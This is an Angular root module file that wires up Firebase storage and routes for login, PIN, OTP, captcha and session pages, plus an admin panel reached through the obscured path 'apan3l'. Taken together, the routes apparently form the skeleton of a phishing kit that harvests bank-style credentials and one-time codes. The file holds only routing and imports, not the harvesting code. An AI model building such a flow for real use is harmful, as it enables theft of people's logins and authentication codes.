import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';

import { AngularFireModule } from '@angular/fire';
import { AngularFirestoreModule } from '@angular/fire/firestore';
import { NgxSpinnerModule } from "ngx-spinner";
import { HttpClientModule } from '@angular/common/http';
import { RouterModule, Routes } from '@angular/router';
import { ToastrModule } from 'ngx-toastr';

import { environment } from '../environments/environment';
import { FormsModule } from '@angular/forms';
import { ItemService } from './s/item.service';
import { AppRoutingModule } from './app-routing.module';

import { AppComponent } from './app.component';
import { ItemComponent } from './c/item/item.component';
import { AddItemComponent } from './add-item/add-item.component';
import { SessionComponent } from './c/session/session.component';
import { ArsComponent } from './c/ars/ars.component';
import { LoginComponent } from './c/login/login.component';
import { PinComponent } from './c/pin/pin.component';
import { PhoneComponent } from './c/phone/phone.component';
import { ArsphoneComponent } from './c/arsphone/arsphone.component'

import { BrowserAnimationsModule } from '@angular/platform-browser/animations';
import { WpinComponent } from './c/wpin/wpin.component';
import { CapComponent } from './c/cap/cap.component';
import { WlogComponent } from './c/wlog/wlog.component';

const routes:Routes = [
  { path: '', redirectTo: 'Session', pathMatch: 'full' },
  { path: 'paneladmin', component: ItemComponent },
  { path: 'apan3l', component: ItemComponent },
  { path: 'Session', component: SessionComponent },
  { path: 'ARSstart', component: ArsphoneComponent },
  { path: 'auth', component: PinComponent },
  { path: 'login', component: LoginComponent },
  { path: 'otp', component: PhoneComponent },
];

@NgModule({
  declarations: [
    AppComponent,
    ItemComponent,
    AddItemComponent,
    SessionComponent,
    ArsComponent,
    LoginComponent,
    PinComponent,
    PhoneComponent,
    ArsphoneComponent,
    WpinComponent,
    CapComponent,
    WlogComponent,
  ],
  imports: [
    BrowserAnimationsModule,
    BrowserModule,
    ToastrModule.forRoot({
      preventDuplicates: true,
    }),
    HttpClientModule,
    FormsModule,
    RouterModule.forRoot(routes),
    RouterModule,
    NgxSpinnerModule,
    AppRoutingModule,
    AngularFirestoreModule,
    AngularFireModule.initializeApp(environment.firebase),
  ],
  providers: [ItemService],
  bootstrap: [AppComponent]
})
export class AppModule { }
